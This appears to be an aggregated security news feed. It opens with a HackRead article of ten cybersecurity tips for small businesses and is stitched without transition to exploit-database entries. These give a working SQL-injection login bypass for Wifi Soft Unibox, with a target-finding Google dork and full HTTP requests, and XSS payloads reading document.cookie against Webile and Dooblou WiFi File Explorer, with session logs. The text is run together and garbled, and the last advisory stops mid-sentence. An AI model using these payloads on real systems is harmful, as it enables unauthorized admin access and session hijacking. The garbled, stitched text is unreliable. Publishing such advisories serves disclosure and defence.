By Owais Sultan
This article presents ten essential cybersecurity tips tailored specifically for small businesses. So let’s get to it! In…
This is a post from HackRead.com Read the original post: 10 Essential Cybersecurity Tips for Small Businesses

This article presents ten essential cybersecurity tips tailored specifically for small businesses. So let’s get to it!

In today’s interconnected digital landscape, small businesses face increasingly sophisticated cyber threats that can wreak havoc on their operations, finances, and reputation. While cybersecurity may seem like a daunting challenge for small enterprises with limited resources, the consequences of a data breach or cyber attack can be devastating. Therefore, it is crucial for small business owners to adopt proactive measures to protect their digital assets and safeguard their businesses.

This article presents ten essential cybersecurity tips tailored specifically for small businesses. These practical and cost-effective strategies aim to fortify your company’s defences against cyber threats, enabling you to navigate the digital world with confidence. By implementing these measures, you can minimize the risk of falling victim to cybercriminals and safeguard your sensitive information, customer data, and overall business integrity.

**10 Best Tips to Consider **

If you’re just about to kickstart your enterprise, we’ve got some game-changing cybersecurity tips to share. Seriously, don’t underestimate the importance of safeguarding your data—it’s a complete nightmare if you lose it. Now, here’s the kicker: machine learning is making waves in the world of cybersecurity. It can supercharge threat detection, spot anomalies, and analyze behaviours. So, to absorb all these tips, explore the role of machine learning in small business cybersecurity. It’s time to level up your cybersecurity game and keep your data locked down tight!

*   **Strong Passwords and Multi-Factor Authentication**

One of the fundamental steps in safeguarding your small business against cyber threats is to enforce strong passwords and enable multi-factor authentication (MFA) across all accounts and systems. Weak passwords make it easier for hackers to gain unauthorized access to your sensitive information, while MFA adds an extra layer of security by requiring additional verification steps.

Encourage employees to create complex passwords that include a combination of upper and lowercase letters, numbers, and special characters. Using different passwords for each account is advisable to minimize the risk of multiple accounts being compromised simultaneously.

*   **Employee Training and Awareness**

Employees play a crucial role in maintaining the cybersecurity posture of a small business. It is vital to invest in comprehensive cybersecurity training programs to educate employees about potential threats and best practices for mitigating them. Train employees on identifying phishing emails, suspicious links, and social engineering techniques commonly used by cybercriminals.

Emphasize the importance of not sharing sensitive information or clicking on unknown links, even if they appear to be from legitimate sources. Regularly update employees about the latest cyber threats and provide them with practical guidance on how to respond to potential incidents.

*   **Regular Software Updates and Patch Management**

To mitigate the risk, it is crucial to ensure that all software applications and operating systems are regularly updated with the latest security patches. Regularly check for updates provided by software vendors and promptly install them. Many updates include critical security fixes that address known vulnerabilities.

Enable automatic updates whenever possible to ensure that systems are continuously protected. Implementing a patch management system can streamline the process of identifying and deploying necessary updates across your network. This helps reduce the risk of overlooking critical patches and ensures that all systems remain up-to-date and secure.

*   **Data Backup and Recovery**

Data loss can have severe consequences for small businesses. Whether it is due to a cyber attack, hardware failure, or accidental deletion, having a reliable backup and recovery system in place is essential. Regularly back up all critical data, including customer information, financial records, and proprietary documents.

Choose a secure backup solution that encrypts the data and stores it in an offsite location or on cloud-based servers. Test the backup restoration process periodically to ensure the integrity and accessibility of your data.

*   **Robust Firewall and Antivirus Solutions**

Firewalls and antivirus software form the foundation of a small business’s cybersecurity defenses. A firewall acts as a barrier between your internal network and the internet, monitoring incoming and outgoing traffic to block potential threats. Invest in a robust firewall solution that offers intrusion detection and prevention, application control, and web filtering features.

Configure the firewall to restrict unauthorized access to your network and allow only essential services. In addition to firewalls, deploy reliable antivirus software on all devices connected to your network. Regularly update the antivirus software to ensure it can effectively detect and remove the latest malware, viruses, and other malicious threats.

*   **Secure Wi-Fi Networks**

Securing your small business’s Wi-Fi network is vital to prevent unauthorized access and potential data breaches. Start by changing the default username and password of your Wi-Fi router to a strong, unique combination. This step helps protect against attackers who target default credentials. Additionally, enable WPA2 or WPA3 encryption on your Wi-Fi network to encrypt the data transmitted between devices and the router. Encryption adds an extra layer of security and makes it significantly more difficult for hackers to intercept sensitive information. Regularly updating your router’s firmware is also crucial, as it ensures that the device has the latest security patches and protection against known vulnerabilities. 

*   **Restrict User Access and Implement Least Privilege**

Controlling user access within your small business is a critical aspect of maintaining strong cybersecurity. By implementing the principle of least privilege, you grant employees access permissions based solely on their job requirements. This approach minimizes the risk of unauthorized access and data breaches.

Regularly review and update user access privileges to align with employees’ changing roles or when individuals leave the company. Removing unnecessary permissions reduces the potential for insider threats and limits the extent of damage that compromised user accounts can cause.

*   **Secure Mobile Devices**

As mobile devices have become essential tools in business operations, securing them is paramount. Require employees to set strong PINs or passcodes to unlock their devices, adding an extra layer of protection. Enable biometric authentication methods like fingerprint or facial recognition where available.

Encrypting data on mobile devices ensures that it remains protected even if the device is lost or stolen. Implement remote wipe capabilities to erase data on lost or stolen devices, preventing unauthorized access and potential data breaches. Installing mobile device management (MDM) software allows for centralized management and enforcement of security policies on employee devices, ensuring consistent protection across the organization.

*   **Regular Security Audits and Vulnerability Assessments**

Conducting regular security audits and vulnerability assessments is crucial for identifying weaknesses and potential entry points for cyber threats within your small business. Engaging a professional security consultant or utilizing security tools can help in this process.

Through these audits and assessments, you can evaluate your network infrastructure for vulnerabilities and misconfigurations, identify potential security gaps in software applications and systems, review access controls and user permissions, and perform penetration testing to simulate real-world cyber attacks and uncover vulnerabilities. By gaining insights into your security posture, you can proactively address weaknesses and improve your overall cybersecurity defences.

*   **Incident Response Plan**

Preparing for the possibility of a cybersecurity incident is essential, even with preventive measures in place. Developing an incident response plan ensures that your small business can respond promptly and effectively in the event of a data breach or cyber attack. Start by defining the roles and responsibilities of individuals involved in incident response. Establish communication channels and procedures for reporting and escalating incidents within your organization.

**RELATED ARTICLES**

1.  Fintech’s Crucial Role in Reducing Cyber Threats
2.  How AI is Tightening Cybersecurity for Businesses
3.  Steps Involved In Penetration Testing In Cybersecurity
4.  DarkBERT: Enhancing Cybersecurity Efforts on the Dark Web
5.  API Security: Unveiling Practices to Secure Digital Ecosystem

10 Essential Cybersecurity Tips for Small Businesses

Wifi Soft Unibox Administration versions 3.0 and 3.1 suffer from a remote SQL injection vulnerability.

    # Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection# Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0"# Date: 07/2023# Exploit Author: Ansh Jain @sudoark# Author  Contact : arkinux01@gmail.com# Vendor Homepage: https://www.wifi-soft.com/# Software Link:https://www.wifi-soft.com/products/unibox-hotspot-controller.php# Version: Unibox Administration 3.0 & 3.1# Tested on: Microsoft Windows 11# CVE : CVE-2023-34635# CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable toSQL Injection, which can lead to unauthorised admin access for attackers.The vulnerability occurs because of not validating or sanitising the userinput in the username field of the login page and directly sending theinput to the backend server and database.## How to ReproduceStep 1 : Visit the login page and check the version, whether it is 3.0,3.1, or not.Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field andenter any random password.Step 3 : Fill in the captcha and hit login. After hitting login, you havebeen successfully logged in as an administrator and can see anyone's userdata, modify data, revoke access, etc.--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Login Request-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Parameters: username, password, captcha, action-----------------------------------------------------------------------------------------------------------------------POST /index.php HTTP/2Host: 255.255.255.255.host.comCookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858dUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 83Origin: https://255.255.255.255.host.comReferer: https://255.255.255.255.host.com/index.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersusername='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Login Response--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------HTTP/2 302 FoundServer: nginxDate: Tue, 18 Jul 2023 13:32:14 GMTContent-Type: text/html; charset=UTF-8Location: ./dashboard/dashboardExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Successful Loggedin Request--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------GET /dashboard/dashboard HTTP/2Host: 255.255.255.255.host.comCookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858dUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://255.255.255.255.host.com/index.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailers--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Successful Loggedin Response--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------HTTP/2 200 OKServer: nginxDate: Tue, 18 Jul 2023 13:32:43 GMTContent-Type: text/html; charset=UTF-8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheCache_control: private<!DOCTYPE html><html lang="en">html content</html>

Wifi Soft Unibox Administration 3.0 / 3.1 SQL Injection

A vulnerability was found in Dooblou WiFi File Explorer 1.13.3. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument search/order/download/mode leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235051.

CVE-2023-3784

Webile version 1.0.1 suffers from multiple cross site scripting vulnerabilities.

    Document Title:===============Webile v1.0.1 - Multiple Cross Site Web VulnerabilitiesReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2321Release Date:=============2023-07-03Vulnerability Laboratory ID (VL-ID):====================================2321Common Vulnerability Scoring System:====================================5.5Vulnerability Class:====================Cross Site Scripting - PersistentCurrent Estimated Price:========================500€ - 1.000€Product & Service Introduction:===============================Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server inthe local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and otherfunctions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,Windows, Linux, iOS, Android and other multi-platform operating systems.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 Wifi mobile android web application.Affected Product(s):====================Product Owner: WebileProduct: Webile v1.0.1 - (Framework) (Mobile Web-Application)Vulnerability Disclosure Timeline:==================================2022-10-11: Researcher Notification & Coordination (Security Researcher)2022-10-12: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2023-07-03: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (Guest Privileges)User Interaction:=================Low User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================Multiple persistent input validation web vulnerabilities has been discoveredin the Webile v1.0.1 Wifi mobile android web application.The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser toweb-application requests from the application-side.The persistent input validation web vulnerabilities are located in the send and add function. Remote attackers are able to inject own maliciousscript codes to the new_file_name and i parameter post method request to provoke a persistent execution of the malformed content.Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicioussource and persistent manipulation of affected application modules.Request Method(s):[+] POSTVulnerable Parameter(s):[+] new_file_name[+] iProof of Concept (PoC):=======================The persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.Vulnerable Source: SendSend message to phone listing<div class="layui-colla-item"><div class="layui-card-header">Message</div><div class="layui-colla-content" style="display:block;padding-left:16px;"><div class="layui-form-item layui-form-text" id="showMsg"><div><font color="blue">20:10:11</font><a href="javascript:;"  title="Copy" onclick="copy(1658081411827)"><i class="iconfont">&nbsp;&nbsp;</i></a><br><span id="c_1658081411827">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span><br><br></div></div></div></div>history logs messages<table class="layui-table layui-form"><thead><tr><th style="text-align: center;vertical-align: middle!important;border-left-width:1px;border-right-width:1px;height:32px;" width="2%" align="center"><input type="checkbox" lay-filter="checkall" name="" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></th><th style="border-right-width:1px;">Message</th><th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="15%">Date</th><th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="3%" valign="center">Action</th></tr></thead><tbody><tr><td style="text-align: center;vertical-align: middle!important;border-left-width:1px;min-height:180px;" align="center"><input type="checkbox" name="id" value="3" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></td><td style="height:32px;"> <span id="c_3">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span></td><td align="center">2022/07/17 20:10</td><td class="td-manage" style="border-right-width:1px;text-align:center;"><a title="Copy" onclick="copy(3)" href="javascript:;"><i class="iconfont">&nbsp;&nbsp;</i></a><a title="Delete" onclick="deleteLog(this,3)" href="javascript:;"><i class="layui-icon">&nbsp;&nbsp;</i></a></td></tr></tbody></table>--- PoC Session Logs #1 (POST) ---  (Add)http://localhost:8080/file_actionHost: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 210Origin:http://localhost:8080Connection: keep-aliveReferer:http://localhost:8080/webile_filesCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}-POST: HTTP/1.1 200 OKContent-Type: application/jsonConnection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked-http://localhost:8080/evil.sourceHost: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveReferer:http://localhost:8080/webile_filesCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 0-Cookie:treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6--- PoC Session Logs #2 (POST) ---  (Send)http://localhost:8080/sendHost: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 180Origin:http://localhost:8080Connection: keep-aliveReferer:http://localhost:8080/webile_sendCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6i={"os":"Windows Windows 10","b":"firefox 102.0","c":">"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}-POST: HTTP/1.1 200 OKContent-Type: application/jsonConnection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked-http://localhost:8080/evil.sourceHost: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveReferer:http://localhost:8080/webile_sendCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: application/octet-streamDate: Sun, 17 Jul 2022 18:08:33 GMTConnection: keep-aliveContent-Length: 0Security Risk:==============The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Webile 1.0.1 Cross Site Scripting

Dooblou WiFi File Explorer version 1.13.3 suffers from multiple cross site scripting vulnerabilities.

    Document Title:===============Dooblou WiFi File Explorer 1.13.3 - Multiple VulnerabilitiesReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2317Release Date:=============2023-07-04Vulnerability Laboratory ID (VL-ID):====================================2317Common Vulnerability Scoring System:====================================5.1Vulnerability Class:====================MultipleCurrent Estimated Price:========================500€ - 1.000€Product & Service Introduction:===============================Browse, download and stream individual files that are on your Android device, using a web browser via a WiFi connection.No more taking your phone apart to get the SD card out or grabbing your cable to access your camera pictures and copy across your favourite MP3s.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.dooblou.WiFiFileExplorer  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.Affected Product(s):====================Product Owner: dooblouProduct: Dooblou WiFi File Explorer v1.13.3 - (Android) (Framework) (Wifi) (Web-Application)Vulnerability Disclosure Timeline:==================================2022-01-19: Researcher Notification & Coordination (Security Researcher)2022-01-20: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2023-07-04: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (Guest Privileges)User Interaction:=================Low User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================Multiple input validation web vulnerabilities has been discovered in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-applicationrequests from the application-side.The vulnerabilities are located in the `search`, `order`, `download`, `mode` parameters. The requested content via get method request is insecure validatedand executes malicious script codes. The attack vector is non-persistent and the rquest method to inject is get. Attacker do not need to be authorized toperform an attack to execute malicious script codes. The links can be included as malformed upload for example to provoke an execute bby a view of thefront- & backend of the wifi explorer.Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicioussource and non-persistent manipulation of affected application modules.Proof of Concept (PoC):=======================The input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.For security demonstration or to reproduce the web vulnerabilities follow the provided information and steps below to continue.PoC: Exploitationhttp://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source"  onmouseover=alert(document.domain)><br>PLEASE CLICK PATH TO RETURN INDEX</a>http://localhost:8000/storage/emulated/0/Download/?mode=31&search=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX%3C%2Fa%3E&x=3&y=3http://localhost:8000/storage/emulated/0/Download/?mode=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3http://localhost:8000/storage/emulated/?order=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEXVulnerable Sources: Execution Points<table width="100%" cellspacing="0" cellpadding="16" border="0"><tbody><tr><tdstyle="vertical-align:top;"><table style="background-color: #FFA81E;background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);background-repeat: repeat-x; background-position:top;" width="700"cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><center><spanclass="doob_large_text">ERROR</span></center></td></tr></tbody></table><br><table style="background-color: #B2B2B2; background-image:url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><span class="doob_medium_text">Cannot find file ordirectory! /storage/emulated/0/Download/<a href="https://evil.source"  onmouseover="alert(document.domain)"><br>PLEASE CLICK USER PATH TO RETURNINDEX</a></span></td></tr></tbody></table><br><span class="doob_medium_text"><span class="doob_link">&nbsp;&nbsp;<ahref="/">>>&nbsp;Back ToFiles&nbsp;>></a></span></span><br></td></tr></tbody></table><br>-<li></li></ul></span></span></td></tr></tbody></table></div><div class="body row scroll-x scroll-y"><table width="100%" cellspacing="0" cellpadding="6" border="0"><tbody><tr><td style="vertical-align:top;" width="100%"><form name="multiSelect" style="margin: 0px; padding: 0px;" action="/storage/emulated/0/Download/" enctype="multipart/form-data" method="POST"><input type="hidden" name="fileNames" value=""><table width="100%" cellspacing="0" cellpadding="1" border="0" bgcolor="#000000"><tbody><tr><td><table width="100%" cellspacing="2" cellpadding="3" border="0" bgcolor="#FFFFFF"><tbody><tr style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);background-repeat: repeat-x; background-position:top;" height="30"><td colspan="5"><table width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="white-space:nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;</span></td><td style="white-space: nowrap;vertical-align:middle" align="right"><span class="doob_small_text_bold">&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=23&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=24&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=38&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN I-<td style="white-space: nowrap;vertical-align:middle"><input value="" type="checkbox" name="selectAll" onclick="setCheckAll();">&nbsp;&nbsp;<a class="doob_button"href="javascript:setMultiSelect('/storage/emulated/', 'action', '18&order=>" <<="">>"<a href="https://evil.source"  onmouseover=alert(document.domain)">');javascript:document.multiSelect.submit();"style="">Download</a>&nbsp;<a class="doob_button" href="javascript:setMultiSelectConfirm('Are  you sure you want to delete? This cannot be undone!', '/storage/emulated/', 'action','13&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>');javascript:document.multiSelect.submit();" style="">Delete</a>&nbsp;<a class="doob_button" href='javascript:setMultiSelectPromptQuery("Create Copy","/storage/emulated/", "/storage/emulated/", "action", "35&order=>"<<<a href="https://evil.source"  onmouseover=alert(document.domain)>", "name");javascript:document.multiSelect.submit();'style="">Create Copy</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Zip</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Unzip</a></td><td align="right" style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;&nbsp;&nbsp;&nbsp;<a href="javascript:showTreeview()"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_tree_dark.png" alt="img" title="Show Treeview"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=23&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img"title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=24&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style:none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=38&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_grid.png" alt="img"title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;</span></td></tr></table>---PoC Session Logs ---http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source"  onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xmlHost: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveReferer:http://localhost:8000/storage/emulated/0/Download/%3Ca%20href=%22https://evil.source%22%20onmouseover=alert(document.domain)%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3EGET: HTTP/1.1 200 OKCache-Control: no-cacheContent-Type: text/xml-http://localhost:8000/storage/emulated/0/Download/?mode=<a+href%3D"https%3A%2F%2Fevil.source"+onmouseover%3Dalert(document.domain)><br>PLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3Host: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveCookie: treeview=0Upgrade-Insecure-Requests: 1GET: HTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidateContent-Type: text/html-http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source"  onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xmlHost: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveReferer:http://localhost:8000/storage/emulated/0/Download/%<a href="https://evil.source"  onmouseover=alert(document.domain)>%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3EGET: HTTP/1.1 200 OKCache-Control: no-cacheContent-Type: text/xmlSecurity Risk:==============The security risk of the multiple web vulnerabilities in the ios mobile wifi web-application are estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, 